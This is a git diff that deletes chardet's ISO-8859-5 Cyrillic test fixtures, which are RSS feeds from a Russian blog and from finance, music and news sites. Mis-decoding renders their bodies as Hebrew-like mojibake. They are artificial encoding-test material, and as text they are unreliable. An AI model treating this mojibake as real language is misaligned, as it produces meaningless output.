    diff --git a/chardet/tests/iso-8859-5-cyrillic/kapranoff.ru.xml b/chardet/tests/iso-8859-5-cyrillic/kapranoff.ru.xml deleted file mode 100644 index 59f8bb9..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/kapranoff.ru.xml +++ /dev/null @@ -1,161 +0,0 @@ - - - - - -Kappa's Lair v2.0 -http://kapranoff.ru/ - -en-us - -2003-12-18T17:40:29+03:00 - - - - - - - - - - - - - - - - - - - - - - - - - -דמ-דמ -http://kapranoff.ru/archives/003663.html - - -kappa -2003-12-18T17:40:29+03:00 - - -ִלא -http://kapranoff.ru/archives/003662.html - - -kappa -2003-12-18T15:46:04+03:00 - - -<![CDATA[° ׂכ ׃ׂא״גױ — װױׂ״״...]]> -http://kapranoff.ru/archives/003661.html -ֳ״׀לכ, ׀ ׂ׳׃ןװ, אװדג ױג״ׂ׃ גׂאחױבגׂ׀. ÷״׃׀ זױ׀ן. ½ױ ײ׀ױױגױ. ÷ט״ כט. ¾װ׀ײװכ בױח א, ±כ װױל װײװ״ׂ ״... - -kappa -2003-12-17T16:54:58+03:00 - - -¼דםװ״׀ -http://kapranoff.ru/archives/003660.html -ְדבב״ ב׀ג ׃דׁכו ׃׀אט׀ו ״ ״׃אױ ׀ ״ו. ÷׀ה. ´׀ׂ וגױ ׀״ב׀גל ס, װ׀ ׂג ׳׀ׁכׂ׀ ׂבס. Lonesome... - -kappa -2003-12-17T13:49:03+03:00 - - -׀ׁם -http://kapranoff.ru/archives/003659.html -·װא׀בגױ ׂ׀ ב וׂבג״. ֿ ׃ ׁכ ׃ ׀״ב׀גל ג, חױ ׳׀״׀בן ׂבמ םגד ױװױמ. ¼ױ ױל. ¾ׂח״׀ ױ... - -kappa -2003-12-17T13:42:39+03:00 - - -÷ױ ׁכגל? -http://kapranoff.ru/archives/003657.html -ֱׁאױװ״, ׂ״װ״, ׂ׀ט אכ ב ד׀ בׂבױ ג ׁױ׳װױלן. ֱ״ײד ׂג, גא׀חד ׁױ׳דכױ װױל׃״ ׂ ׁאןב ״גױאױגױ, אוײד גױבגכ ׀... - -kappa -2003-12-13T12:15:13+03:00 - - -´ױל בג״גדז״״ -http://kapranoff.ru/archives/003656.html -ַױׂױחױ, גאכ בװױ׀ ױן ױ׀, בױ׃װן גױח׀ױג בׂס װױלאײװױ״ױ :) ֳא׀, ן ג׀ ׀׃׀מ, װ׀ ׂױװל? ¿בׂןי׀מ ױ ׂכוװ ׂגא׃... - -kappa -2003-12-12T15:18:10+03:00 - - -כגװכׁא -http://kapranoff.ru/archives/003655.html - - -kappa -2003-12-09T17:51:23+03:00 - - -ֱ׀ױ -http://kapranoff.ru/archives/003646.html - - -kappa -2003-12-07T23:09:31+03:00 - - -ֱאג-ֽבאױבב בׁי׀ױג -http://kapranoff.ru/archives/003654.html - - -kappa -2003-12-06T18:19:27+03:00 - - -·ױןױ-3 -http://kapranoff.ru/archives/003653.html - ´ױׂח׀ ״ װ׀׀-׀׀. ³ױ״׀ל. ·װױבל ׂבס.... - -kappa -2003-12-05T13:34:08+03:00 - - -¼ד׳כ׀ ב ׀״ -http://kapranoff.ru/archives/003652.html - ÷ד״ ׂג. ¿א׀װׂ׀ בג׀א״׀. ֱױׁן.... - -kappa -2003-12-04T19:56:54+03:00 - - -½ׂבגױל -http://kapranoff.ru/archives/003651.html -° דב׀גכ ְױׂן״ ב גׂ׀א״י״ ׳׀׀ח״ׂ׀ױג ׳׀״בל ׂ׃ ׀לׁ׀. ² בדׁׁגד ״, בג׀ג״, ׁדװדג ׂ ֶ´ֵ. ֿ ײױג ׁכגל בוײד.... - -kappa -2003-12-04T18:58:46+03:00 - - -ֱ״״ ׂ, ״בױכ חױ -http://kapranoff.ru/archives/003650.html -±³ ׂבן א׀׳. ¿״גױ, ױבגל ן, ן ״טד ױב״, ן ״ו מ, ד ױן ױבגל בׂן םבגױג״׀. ¸ ױבגל... - -kappa -2003-12-03T22:44:54+03:00 - - -ׂײ״-ׂײ״ -http://kapranoff.ru/archives/003649.html -° ן, ױײװד גױ, ׂױאדבן ״׳ ±אןב׀. ֲ׀״ױ װױ׀.... - -kappa -2003-12-03T11:37:49+03:00 - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/money.rin.ru.xml b/chardet/tests/iso-8859-5-cyrillic/money.rin.ru.xml deleted file mode 100644 index 7455b9c..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/money.rin.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - -ֽ״׀ ״ ה״׀בכ -http://money.rin.ru -ֽ״חױב״ױ ״ ה״׀בׂכױ ׂבג״ -ru-ru -Copyright 2003, Greenline, Kazan, Russia -Wed, 04 Jan 2006 02:20:05 GMT -Wed, 04 Jan 2006 02:20:05 GMT -http://backend.userland.com/rss091 -money@rin.ru -webmaster@dionys.pp.ru - - -ֱ¸ֲµֱ ױ דגׂױאװ״׀ ׂגכ ׀ םבאג חױא ״אכ ״ בױגאׂכו -http://money.rin.ru/content/news/?id=106325&from=rss -ֱױאױג׀א״׀ג ÷ׂױז״״ ױײװד׀אװ גא׃ׂױ װ״״״ ׂ״װ׀״ ה׀דכ ״ האכ, ׀וװןי״״בן װ ד׃א׳ ״בחױ׳ׂױ״ן (ֱ¸ֲµֱ), ׳׀ןׂ״ ׂ ׂגא״, חג ױ בײױג דגׂױאװ״גל ׂגכ ׀ םבאג חױא ״אכ ״ בױגאׂכו ׀ 2006 ׃װ װ גױו א, ׀ בגא׀כ-א״׳ׂװ״גױ״ ױ אױװבג׀ׂןג דמ ״הא׀ז״מ בבגן״״ דןז״״ בױגאׂכו. - - - -²ׂױװױ ױײװד׀אװכ ׳׀אױג ׀ םבאג חױא ״אכ -http://money.rin.ru/content/news/?id=106324&from=rss -²ׂױװױ ױײװד׀אװכ ׳׀אױג ׀ םבאג חױא ״אכ. ÷׀ ױאױװ׀ױג "ֽו ¼בׂכ", םג אױטױ״ױ א״ןג ׂ ¶ױױׂױ ׀ ׳׀בױװ׀״״ ױײװד׀אװ א׃׀״׳׀ז״״ גא׃ׂױ ׃א׳ןי״״ ״בחױ׳ׂױ״ױ ׂ״װ׀״ האכ ״ ה׀דכ (CITES). - - - -¿אׁױ׀ אוײװױ״ן ׃א׀״זכ גדא״בג״חױב״״ ׀ׂגׁדב׀״, בױװדמי״״ ״׳ ְבב״״ ׂ µׂאד, אױטױ׀ -http://money.rin.ru/content/news/?id=106323&from=rss -¿אׁױ׀ אוײװױ״ן ׃א׀״זכ גדא״בג״חױב״״ ׀ׂגׁדב׀״, בױװדמי״״ ״׳ ְבב״״ ׂ µׂאד, אױטױ׀. ÷׀ בׁי״״ ׂ ְבב״ב במ׳ױ גדא״װדבגא״״, ב 1 ןׂ׀אן 2006׃. ׂ ±ױאדבב״״ גױןמגבן ׂבױ ױבגכױ בׁאכ א״ ױאױבױחױ״״ ׃א׀״זכ. - - - -¿דג״ װ״ב׀ ׳׀ ׂױבױ״״ ״׳ױױ״ ׂ ֲ׀ײױכ װױב ְִ -http://money.rin.ru/content/news/?id=106322&from=rss -¿אױ׳״װױג ְבב״״ ²׀װ״״א ¿דג״ װ״ב׀ הױװױא׀לכ ׳׀ "¾ ׂױבױ״״ ״׳ױױ״ ׂ בג׀גל״ 147 ״ 388 ֲ׀ײױ׃ װױב׀ ְבב״ב ִױװױא׀ז״״", א״ןגכ ³בװד 23 װױ׀ׁאן ״ װׁאױכ ֱׂױג ִױװױא׀ז״״ 27 װױ׀ׁאן 2005 ׃װ׀. - - - -"³°·¿ְ¾¼" ¿ְµ÷ְ°ֲ¸» ¿¾ֱֲ°²÷¸ ³°·° ½° ֳ÷ְ°¸½ֳ -http://money.rin.ru/content/news/?id=106321&from=rss -ֱױ׃װן ׀ח״׀ן ב 10.00 ׂ בׂן׳״ ב ג׀׳ ½°÷"½׀הג׃׀׳ ֳא׀״כ" ג װ״ב׀״ן גא׀ג׀ ׀ בג׀ׂד ׃׀׳׀ ׂ 2006 ׃װד, ¾°¾"³׀׳א" אױא׀ג״ בג׀ׂד ׃׀׳׀ גאױׁ״גױן ֳא׀״כ. ֱגׂױגבגׂדמיױױ אױװדאױײװױ״ױ ׁכ ה״ז״׀ל ׀א׀ׂױ דא׀״ב בגאױ 31 װױ׀ׁאן 2005 ׃װ׀. - - - -²ׂװןגבן ׂכױ א׀ׂ״׀ ױאױבױחױ״ן ׃א׀״ז ב בגא׀׀״ ±׀ג״״ -http://money.rin.ru/content/news/?id=106320&from=rss -¸׳ױױ״ן ׂ אןװױ ױאױבױחױ״ן ׃א׀״ז ב בגא׀׀״ ±׀ג״״ ׂׂװןגבן ב 1 ןׂ׀אן 2006 ׃װ׀. ÷׀ בׁי״״ ְ¸° ½ׂבג״ ׂ ¼¸´ ְבב״״, א״ גא׀׳״גױ חױאױ׳ גױאא״גא״מ »״גׂכ ׂ ÷׀״״׃א׀װבדמ ׁ׀בגל ״ ״׳ ׁ׀בג״ ב 2006 ׃װ׀ אױא׀י׀ױגבן װױבגׂ״ױ ׳׀׃א׀״ח׃ ׀באג׀ ְֱֱֱ. - - - -ֱ 1 ןׂ׀אן ׂבגד׀ױג ׂ ב״ד ׳׀ ׁ בׁכו ם״חױב״ו ׳׀ו -http://money.rin.ru/content/news/?id=106319&from=rss -ֱ 1 ןׂ׀אן ׂבגד׀ױג ׂ ב״ד ׳׀ ׁ בׁכו ם״חױב״ו ׳׀ו (¾ֽ·), אױװדב׀גא״ׂ׀מי״ ג׀ײױכױ ״ ׀׃ׂכױ ל׃גכ װן אױ׳״װױגׂ םג״ו ׳. ֱ׃׀ב ׳׀׀, ׂ ְבב״״ ׁדװדג ב׳װ׀כ ¾ֽ· װׂדו ג״ׂ: אכטױ-א״׳ׂװבגׂױכױ ״ גױו״-ׂױװאױחױב״ױ. - - - -ִױװױא׀ל׀ן ג׀ײױ׀ן בדײׁ׀ ׂ 2005 ׃װד -http://money.rin.ru/content/news/?id=106318&from=rss -¿ױ״ױ װוװ ח׀בג״ הױװױא׀ל׃ ׁמװײױג׀ בג׀ׂ׀בל װ״ ״׳ ׂ׀ײױט״ו ׀א׀ׂױ״ װױןגױלבג״ ג׀ײױ בדײׁכ ְבב״״. ² 2005 ׃., אױװׂ׀א״גױלכ װ׀כ, ג׀ײױכ״ א׃׀׀״ ױאױח״בױ ׂ װוװ הױװױא׀ל׃ ׁמװײױג׀ 2 גא״״׀ 102,2 ״״׀אװ׀ אדׁױ, חג בבג׀ׂ״ 103% ג גאל׃ ׳׀װ׀״ן. - - - -»מׁכױ ׀כ ױחד -http://money.rin.ru/content/news/?id=106317&from=rss -ֱ ואט״ ׀בגאױ״ױ ׂבגאױח׀מג ½ׂכ ׃װ ג׀ײױ״״ ´׀לױ׃ ²בג׀. ´ן םג׃ ױבגל ואט״ ׂװ - װױ׀ׁאלב״ ׀ בׁאד ג׀ײױכו ׀גױײױ ׂכױ ״״ ׀ 115 %. ² הױװױא׀לכ ׁמװײױג ױאױח״בױ 9 אװ. - - - -÷בדלג׀ג״ׂכ בׂױג אױט׀ױג ״ ױׁלט״ױ ׂאבכ, ״ זױגד׀לכױ אׁױכ -http://money.rin.ru/content/news/?id=106316&from=rss -¿ בׁיױ״מ אױבב-בדײׁכ ־ֲֳ ְִ, חױאױװױ ׳׀בױװ׀״ױ ÷בדלג׀ג״ׂ׃ בׂױג׀ א׀ׁגױ ב דח׀בג״׀״ ²ֽ´ א״ ־ײ ג׀ײױ דא׀ׂױ״״ בבגןבל ׂ װױ׀ׁאױ ׀ ׁ׀׳ױ ¾¾¾ "ֲ׀׃׀א׃ב״ ׀ׂגׁ״לכ ׳׀ׂװ". - - - -÷ױ׃״ן ֱֲִ ְבב״״ א׀בבגאױ׀ ׂאבכ װ׃גׂ״ ¿׀׀ װױבגׂ״ אױ׀״׳׀ז״״ ÷זױז״״ א׀׳ׂ״ג״ן ג׀ײױכו א׃׀ׂ ְבב״ב ִױװױא׀ז״״ -http://money.rin.ru/content/news/?id=106315&from=rss -29 װױ׀ׁאן 2005 ׃װ׀ בבגןבל ׳׀בױװ׀״ױ ױ׃״״ ִױװױא׀ל ג׀ײױ בדײׁכ ְבב״״, ׀ גא ׁכ״ א׀בבגאױכ ׂאבכ ׂכא׀ׁג״ ׀׀ ױא אױ׀״׳׀ז״״ ÷זױז״״ א׀׳ׂ״ג״ן ג׀ײױכו א׃׀ׂ ְבב״ב ִױװױא׀ז״״ ׀ 2006-2010 ׃װכ, װׁאױ ¿א׀ׂ״גױלבגׂ ְבב״ב ִױװױא׀ז״״ 8 װױ׀ׁאן ב.׃. - - - -¾ ׂבגדױ״״ ׂ ב״ד בג׀ׂױ״ן ¿א׀ׂ״גױלבגׂ׀ ְִ "¾ אױ׃ד״אׂ׀״״ ״אג׀ ׃ׂןװ״כ אײױ ׂ 2006 ׃װד" -http://money.rin.ru/content/news/?id=106314&from=rss -ֱ 1 ןׂ׀אן 2006 ׃װ׀ ׂבגד׀ױג ׂ ב״ד בג׀ׂױ״ױ ¿א׀ׂ״גױלבגׂ׀ ְִ N 729 ג 5.12.2005 ׃. "¾ אױ׃ד״אׂ׀״״ ״אג׀ ׃ׂןװ״כ אײױ ׂ 2006 ׃װד ". ֱ׃׀ב בג׀ׂױ״מ, ױןמגבן ׀״ױׂ׀״ן גאױו װבדׁ׳״ז״ ֲ½ ²ֽ´ (0202 30 100 3, 0202 30 500 3 ״ 0202 30 900 3), ׂ גאכױ ׂמח׀ױגבן דבׂ״ױ הא׀-׃א׀״זכ בגא׀כ ׂׂ׳׀, ׀ ג׀ײױ דבג׀׀ׂ״ׂ׀מגבן ׂכױ בג׀ׂ״ ׂׂ׳כו ט״ ב׃׀ב א״ײױ״מ. - - - -÷ׂגכ ׀ ״אג ׁדװדג ״בל׳ׂ׀כ בגלמ -http://money.rin.ru/content/news/?id=106313&from=rss -ֱ 1 ןׂ׀אן ׂבגד׀ױג ׂ ב״ד בג׀ׂױ״ױ ¿א׀ׂ״גױלבגׂ׀ ְִ "¾ װ״גױלכו ױא׀ו אױ׃ד״אׂ׀״מ ״אג׀ ׃ׂןװ״כ, בׂ״״כ ״ ןב׀ װ׀טױ ג״זכ ׂ 2006 - 2009 ׃װ׀ו" (N 733 ג 5.12.2005 ׃.), א״׳ׂ׀ױ ׁױבױח״גל ױ ״בל׳ׂ׀״ױ ׂג ׀ ״אג ױאױח״בױכו ׂ״װׂ אװדז״״. - - - -ֱ״ײ׀מגבן בג׀ׂ״ ט״כ ׀ בׂ״״ד -http://money.rin.ru/content/news/?id=106312&from=rss -ֱ 1 ןׂ׀אן 2006 ׃װ׀ ׂבגד׀ױג ׂ ב״ד בג׀ׂױ״ױ ¿א׀ׂ״גױלבגׂ׀ ְִ "¾ אױ׃ד״אׂ׀״״ ״אג׀ בׂ״״כ ׂ 2006 ׃װד" (N 730 ג 05.12.2005 ׃.), דבג׀׀ׂ״ׂ׀מיױױ בד׀אכ ׁךױ ׂׂ׳׀ ׂ ְבב״מ בׂ״״כ ׂ א׀׳ױאױ 476,1 גכב. - - - -ֱא״גל ׃א׀ג ״ װױד -http://money.rin.ru/content/news/?id=106311&from=rss -ֱ 1 ןׂ׀אן 2006 ׃װ׀ ׂבגד״ג ׂ ב״ד א״׀׳ ִױװױא׀ל ג׀ײױ בדײׁכ "¾ׁ ב׀א״ׂ׀״״ ג׀ײױכ״ א׃׀׀״ ׂבגד״ׂט״ו ׂ ׳׀דמ ב״ד בדװױׁכו ׀גׂ ׀אׁ״גא׀ײכו בדװׂ ׂ אןװױ ׀װ׳א׀" (N 1080 ג 17 ןׁאן 2005 ׃װ׀). - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/music.peeps.ru.xml b/chardet/tests/iso-8859-5-cyrillic/music.peeps.ru.xml deleted file mode 100644 index 6f1a3e1..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/music.peeps.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - ¼ד׳כ׀ ׀ PeePs.ru: אױזױ׳״״ - µײױװױׂױ ד׳כ׀לױ ״׳װ׀״ױ - http://music.peeps.ru - - - ¼ד׳כ׀ ׀ PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - ִ׀ג, חג ׁכׂט״ױ «½ױבױװכ», ׀ כױ «Smash!» ׂׂ׀״״בל ׂ גױ טד-ׁ״׳ױב׀ ׁ׀׃װ׀אן ׁױװױ ׂ אױבג״ײ ד׳כ׀ל דאבױ, ״ ״ ׁא׀׳ ױ ׳ׂןױג בג׀ׂ״גל ״ו ׂ װ״ דאׂױל ב «´אד׃״״ א׀ׂ״׀״», «÷אן״» ״״ «ִ׀ׁא״». ²-ױאׂכו, «Smash!» מג ׀ ׀׃״ב, ׂ-ׂגאכו, מג אבג ׳װאׂ! - - - - ±¾»ָּ°ֿ ֱֲ¸ְ÷° 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - ²בױ גױױ׳א״גױן, ׀ ג׀ײױ גױױ׳א״גױל״ז׀! ±׀׃װ׀אן בׂױד בׁא״ד ״ א׃א׀ױ «±לט׀ן בג״א׀» °.¼׀׀וׂ װ׀א״ג ׂױבױױױ ׀בגאױ״ױ! ½׀ ׀בבׂדמ «ֱג״אד» א״׃׀טױכ װו׳ן״ °בד ב ױבױ «²חױא׀», ֱׂױג׀ ב ו״ג «²בױ-ג׀״ ײ», ¼׀ט׀ ְ׀בדג״׀ ב «ֱד׀בטױװט״ װײװױ», ֲ׀ן ±ד׀ׂ׀ ב גאױ - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ֱׂ benefit ב ׀׃״ב׃ ׳׀ח׀ױג «ל׳׀», «ׂכ׃װ׀». ֳײ ױ ׳׀מ, ׀ בל ׂכ׃װ ׁכ אװמבױא׀ װדםג׀ בג׀ׂןגל ׀בג״ד ׁױ׳ ׀׳ׂ׀״ן,  ג, חג ב״׃ «Sex Sells» װ׃ ױ ב׳׀ ב ג-׳״ז״, ןׂ ױ בג׀ׂ״ «Benefit» ׂ א״׃אכטױ. - - - - "¾÷µ°½ µ»ּ·¸" - ֱדױאב״ױגאiן - http://music.peeps.ru/news/s/2003/03/19/1429.html - ¿ױאׂױ, חג ׁאב׀ױגבן ׂ ׃׀׳׀ - ׁײ׀ װ״ב׀: ׀ׂ״ט״ האגױ״׀ ׀ חױא הױ - ׂ״װ״, םג ׂכא׀ײױ״ױ ג ב׀ «ב״ױגא״״» ב א״בג׀ׂ «בדױא», ׁא׀׳ׂ׀ ׂ ׀׳ׂ׀״״ ׀לׁ׀. ½, חג ג׀ױ בדױאב״ױגא״ן? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - ½ׂכ ׀לׁ ׀ױא״׀ TLC 3D - חױגׂױאגכ  בחױגד ׂ װ״ב׃א׀ה״״ גא״. ² אױ׳דלג׀גױ גא׀׃״חױב ׃״ׁױ״ ׂ ׀ׂג׀ג׀בגאהױ װ ״׳ דח׀בג״ז ׃אדכ »״׳כ Left Eye »ױב גא״ אױׂא׀ג״בל ׂ װדםג. Chilli ״ T-Boz אױט״״ אװײ׀גל בׂױבגדמ א׀ׁגד ׁױ׳ גאױגלױ דח׀בג״זכ, , ױבגױבגׂױ, חג 3D בׂןיױ ױױ ׀ןג״. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - ´״װײױ ֲױ - ׀בגױא ױׂאױב׃ דאׂן, ׂכבגד׀ׂט״ ׂױבגױ ב ג׀״״ ג״ג׀׀״ אם׀, ׀ RunDMC, Wu-tang Clan, LL Cool J ״ KRS-One, בװױ׀ׂט״ אױ״בכ ׀ ױב״ Brandy, Fugees ״ װ׀ײױ Jay-Z. ²ג ״ ׂכ ױ׃ ׀לׁ - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - ²כדיױכ ׀״ױ BMG בׁא״ דחט״ו ױבױ ױׂז׀, ׳״גא׀ ״ אװמבױא׀ ´״גױא׀ ±ױ׀ - א׀װבגל װן א׀ג״חכו ״ז ב׀װ׃ב׃ ױז׀. ´׀ ״ ױ גל װן ״ו: בׁא״ ױא״גן׳׀גױל ױװ״ח -ד׳כ״ ג״ח װװױג װן ׂױחױא״ ב ג׀ז׀״. - - - - ÷אדג גכ ׀. ִ°±ְ¸÷° ·²µ·´ - http://music.peeps.ru/news/s/2003/03/12/1366.html - ִ׀ׁא״חױ א״׳ׂװבגׂ ױ בג״ג ׀ ױבגױ, ׀ ׂכוװ״ג ׀ ׂכױ אױלבכ - «׳ׂױ׳װ׀דגכױ» «אדג ׀״» גױױאל ױ גל ׀ גׂ-םא׀,  ״ ׀ ׀ג-װ״ב. ְױ׳דלג׀ג, ׃ׂאןי״ ב׀ ׳׀ בױׁן - «ה׀ׁא״׀» ״. ¼׀גׂ״ױ א׀ׁג׀ױג בג׀ׁ״ל ״ אװדג״ׂ. - - - - "·ׂױא״" - "׃װ" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 גאױׂ װױׁמג׃ ׀לׁ׀ ׃אדכ «·ׂױא״» ׂ זױ בג׀ׂןמג א״ןגױ ׂױח׀גױ״ױ,  ײױ ׂאױן ױ ״װ׀ױג ידיױ״ױ ױגא׃ װׁא׀׳״ן. ³װױ-ג ׀ בױאױװ״ױ אבדט״ׂ׀״ן װ״ב׀ ןׂןױגבן ידיױ״ױ, חג ״׃א׀ױג װ׀ ״ ג׀ ײױ ױבן - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ֱׁא״ The Best, ׂכדיױכ ה״א CD Land ׂ 2002 ׃װד, אױװבג׀ׂןױג בׁ װׁאד דחט״ו ו״גׂ ׃אדכ «¼א׀לכ ÷װױב». ´ד׀ױגבן, םגאכ «¼א׀לכ ÷װױב» ׂ בׁ אױװבג׀ׂױ״״ ױ דײװ׀מגבן. - - - - 'ֲױל - 64' - '¾ׁאכׂ״ הא׀׳' - http://music.peeps.ru/news/s/2003/02/26/1291.html - ´ױׁמגכ ׀לׁ ׃אדכ ״׳ ½ׂ׃ ¾ב׀ «ֲױל - 64» װ ׀׳ׂ׀״ױ «¾ׁאכׂ״ הא׀׳» גױחױ ׂבױׁיױ ׁױ׳למ װכו אבב״ב״ו ׀װ: ׂאװױ ׁכ ״ ׃״ג׀אכױ ב א״בדגבגׂדמג, ״ ׂ׀ ואט, ״ ״׃א׀מג ױו, ״ ױב״ בח״ןמג א׀ב״ׂכױ. - - - - Angelight - ´ױג״ ¾ױ׀׀ - http://music.peeps.ru/news/s/2003/02/23/1257.html - ´איסכױ ױװׁאײױ׀גױ״ ד׳כ״ למ-םװײ װ׀ׂ דײױ אױבג״״ ױס דװ, װׁא׀׳ ״ ׁױבבכבױ. ¸ םג ױׂ׳״א׀ן ׀ ג, חג ב׀כ בױװׂ׀גױלכ ױס אבב״ב״ ׀װױג Angelight אױבױװדױג ׀ײװכ בׂ״ ׀לׁ ׂױ אױגכױ זױ״. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - ¿וײױ, װׁ״ׂט״בל ׳ׂױ׳װ׃ בג׀גדב׀, ״ בג׀ׂ בׂױ׃ אװ׀ ׳׀װ׀גױן״ ײ׀א׀, NOFX אױט״״ בגלמ ׃אד׳״גלבן ׂ װדא׀ׂ׀ן״ױ ״ ב׀׀אװ״אׂ׀״ױ. »״א״׀ ג״׀: «She's got a silicone cock sticking in her ass  one in her cunt» ״״ «there's nothing finer than having a vagina» ׂאןװ״ א״װױגבן  ׂדבד דגחױכ ״גױױגד׀׀,  חױ׃ ׂכ וגױ״, םג ײױ ׂבױ-ג׀״ ׀-א. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - ¿א׃אױבב״אדן ב ׀ײװכ ׂכ ׀לׁ NUFN וײױ װבג״׃״ בׂױאטױבגׂ׀. ² ג״ח״ױ ג ׁלט״בגׂ׀ װׁא׀׳ ׂױבױכו -׀ ׃אד, NUFN ׀װדג ׂ בׂכ בׂױ ד׳כ״ ׃אדבגכױ ױװ״״, גאכױ ׂ בחױג׀״״ א״ׂױכ ׂ׀ ״ ן׃״ ׃״ג׀אכ ׳ׂד א״׳ׂװןג ױ״׳׃׀װ״ױ ׂױח׀גױ״ױ. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - ֳװ׀ח בחױג׀ן ג״״ח ׀״הא״בדמ ׀ׂבדמ ױװ״חבגל ב דאד׃״ ו׀אװאׂכ ׳ׂדח׀״ױ (ׂ ד׳כױ) ״ בז״׀ל-״ג״חױבדמ גױ׀ג״ד ב ״חכ״ ױאױײ״ׂ׀״ן״ (ׂ גױבג׀ו), GR ױ ׂ ױאׂכ א׀׳ װ׀׳כׂ׀מג, חג ןׂןמגבן װ ״׳ ב׀כו ב״לכו ״ ױ׳׀דאןװכו ׀-׃אד 90-ו. - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/newsru.com.xml b/chardet/tests/iso-8859-5-cyrillic/newsru.com.xml deleted file mode 100644 index c81dbab..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -½ׂבג״ -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ² ֲדאז״״ ב״ו״חױב״ ױ׳װאׂכ דײח״׀ ׂ׳אׂ׀ ודטד ׂ ׳װ׀״״ ¼״מבג׀ - http://www.newsru.com/world/03jan2006/ankara.html - ¸ז״װױג א״׳טױ ׀ װ ״׳ םג׀ײױ ׳װ׀״ן ¼״מבג׀ ׂ °׀אױ, ׃װױ א׀בײױ דא׀ׂױ״ױ ״בױ״ן ׀׀׳׀״. ² ״ז״״ דׂױאןמג, חג א״בטױװטױױ ױ ןׂןױגבן גױא׀ג. ²״ׂ״ א״בטױבגׂ״ן ׳׀װױאײ׀. - ² ״אױ - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ² ³¸±´´ ׁױי׀מג ױ טגא׀הׂ׀גל ׂ ןׂ׀אױ ׂװ״גױױ ׳׀ ׀אדטױ״ן ׂכו א׀ׂ״ װאײ׃ װׂ״ײױ״ן - http://www.newsru.com/russia/03jan2006/gibddnow.html - ² ױאׂכױ ױװױ״ ׂ׃ ׃װ׀ בגאדװ״״ ³¸±´´ ׁדװדג ןל גב״גלבן ׂװ״גױן, ױ דבױׂט״ ׂכדח״גל ׂכױ א׀ׂ״׀ װאײ׃ װׂ״ײױ״ן, ׂבגד״ׂט״ױ ׂ ב״ד ב 1 ןׂ׀אן 2006 ׃װ׀. ¸בױגא׀ ³¸±´´ אױװ״ב׀ ׁךןב״גל ׂװ״גױמ בדגל ׀אדטױ״ן ״ בװױ׀גל ױד אױװדאױײװױ״ױ. - ² ְבב״״ - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ² ¸א׀ױ א׀׳ׁ״בן ׀ױא״׀ב״ ׂױכ ׂױאגױג: װׂױ ׃״ׁט״ו - http://www.newsru.com/world/03jan2006/heli.html - ¿ װ׀כ ״א׀ב ״ז״״, ׂױאגױג ד׀ ״״ ׁכ בׁ״ג ׂ ׂגא״ א״ױא ׂ 60 ״ױגא׀ו בױׂױא-ׂבגחױױ ±׀׃װ׀װ׀. ² אױ׳דלג׀גױ ״ז״װױג׀ ׃״ׁ״ װׂױ ׂױבדײ׀י״ו ׀א״״ ֱָ°. - ² ״אױ - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - ְבב״ב״ױ גױ״ב״בגכ ױדװ׀ח בג׀אגׂ׀״ ׀ ÷דׁױ ֵ׀׀ - http://www.newsru.com/sport/03jan2006/hopman.html - ֱׁא׀ן ְבב״״ גױ״בד א״׃א׀׀ בׂ בג׀אגׂכ ׀גח ׀ גא׀װ״ז״ ׂ׃װױ גדא״אױ ÷דׁ ֵ׀׀ ב א״׳ׂכ הװ ״״ װ׀אׂ ֱָ°, גאכ אוװ״ג ׂ ׀ׂבגא׀״ב ׃אװױ ¿ױאג. - ֱאג - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - ±׃׀גכױ אבב״ן״ װױ׀מג ׁאג ״ אױװױןמג בג״ל ױׂאױב״ו װׂ װכ - http://www.newsru.com/russia/03jan2006/women.html - ÷אױבגלןב״ױ ׁד׳כ, ׃ ױוׂ ״ ׁאב״ױ דא׀טױ״ן - ׂ כױטױ בױ׳ױ ׁ׃׀גכױ אבב״ן״ װױ׀מג ׁאג ״ אױװױןמג בג״ל ׳׀׀װכו װׂ װכ. ְדבב״ױ ב דװׂלבגׂ״ױ ׂכבג׀ׂןמג בׂױ ׁ׃׀גבגׂ ׀׀׳, ״טױג S&#252;ddeutsche Zeitung. - ² ְבב״״ - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - ² ִא׀ז״״ ב 4 ןׂ׀אן גױןױגבן חאױ׳ׂכח׀ױ ײױ״ױ, ׂׂױװױױ ׂ בׂן׳״ ב ׀בבׂכ״ ׁױבאןװ׀״ - http://www.newsru.com/world/03jan2006/nochs.html - ַאױ׳ׂכח׀ױ ײױ״ױ ׁכ ׂׂױװױ ׂ ִא׀ז״״ 8 ןׁאן 2005 ׃װ׀ ד׀׳ אױ׳״װױג׀ בגא׀כ ׂ בׂן׳״ ב ׀בבׂכ״ ׁױבאןװ׀״ ׂ א״׃אװ׀ו 